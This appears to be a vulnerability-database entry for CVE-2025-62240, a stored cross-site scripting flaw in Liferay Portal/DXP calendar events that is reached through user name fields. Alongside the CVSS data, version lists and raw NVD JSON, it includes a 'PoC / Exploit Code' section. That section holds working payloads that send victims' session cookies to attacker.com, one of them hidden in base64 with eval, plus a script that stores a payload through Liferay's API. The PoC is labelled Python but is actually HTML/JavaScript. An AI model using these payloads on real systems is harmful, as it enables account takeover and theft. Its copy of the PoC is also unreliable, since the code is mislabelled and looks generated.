CVE-2025-62240

Description

Multiple cross-site scripting (XSS) vulnerabilities with Calendar events in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.7, 7.4 update 35 through update 92, and 7.3 update 25 through update 36 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name or (3) Last Name text field.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.3:update25:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.3:update26:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.3:update27:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.3.35 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.7

Liferay DXP 7.4 update 35 - update 92

Liferay DXP 7.3 update 25 - update 36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-62240 PoC - Stored XSS via User Name Fields in Liferay Calendar -->
<!-- Step 1: Attacker logs into Liferay Portal/DXP with a low-privilege account -->
<!-- Step 2: Navigate to User Profile settings and modify name fields with malicious payload -->

<!-- Payload for First Name field -->
<script>alert('XSS via First Name');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Payload for Middle Name field -->
<img src=x onerror="fetch('https://attacker.com/log',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:document.location.href})})">

<!-- Payload for Last Name field -->
<svg/onload=eval(atob('ZmV0Y2goImh0dHBzOi8vYXR0YWNrZXIuY29tLz9kYXRhPSIrZG9jdW1lbnQuY29va2llKQ=='))>

<!-- Step 3: Create or participate in a Calendar event that displays the attacker's user name -->
<!-- Step 4: When any victim (including admin) views the calendar event, the XSS payload executes -->

<!-- Automated exploitation script -->
<script>
// Simulating the attack flow
const maliciousPayload = '<img src=x onerror=alert(document.domain)>';
// Attacker sets First Name to maliciousPayload via Liferay API
fetch('/api/jsonws/user/update-user', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
        firstName: maliciousPayload,
        middleName: '',
        lastName: 'TestUser'
    })
}).then(r => console.log('Payload stored'));
// When victim views calendar event containing this user, XSS triggers
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62240
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62240
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62240/
[4] VulDB https://vuldb.com/cve/CVE-2025-62240
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62240

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62240", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:40.300", "lastModified": "2025-12-12T18:25:33.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting (XSS) vulnerabilities with Calendar events in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.7, 7.4 update 35 through update 92, and 7.3 update 25 through update 36 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name or (3) Last Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndExcluding": "2023.Q3.8", "matchCriteriaId": "6411D407-A5BB-40F9-8416-394C7AF797D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update25:*:*:*:*:*:*", "matchCriteriaId": "DD43C626-F2F2-43BA-85AA-6ADAE8A6D11F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update26:*:*:*:*:*:*", "matchCriteriaId": "5C72C0E0-7D0B-4E8F-A109-7BB5DCA1C8D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update27:*:*:*:*:*:*", "matchCriteriaId": "7E796B04-FF54-4C02-979C-87E137A76F63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update28:*:*:*:*:*:*", "matchCriteriaId": "07C3D771-5E1B-46C4-AAF8-F425377582D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update29:*:*:*:*:*:*", "matchCriteriaId": "B08F95DC-BE49-4717-B959-2BE8BD131953"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update30:*:*:*:*:*:*", "matchCriteriaId": "E915FBC2-9BF7-4A99-B201-1F176D743494"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update31:*:*:*:*:*:*", "matchCriteriaId": "E44E02C2-6F83-4525-BF9D-E82CE9A9880E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update32:*:*:*:*:*:*", "matchCriteriaId": "660F37C6-61E6-4C34-8A7E-99C7DBEB8319"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update33:*:*:*:*:*:*", "matchCriteriaId": "5AD8D0D3-31AC-41E5-A780-5D5B18BF6991"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update34:*:*:*:*:*:*", "matchCrite ... (truncated)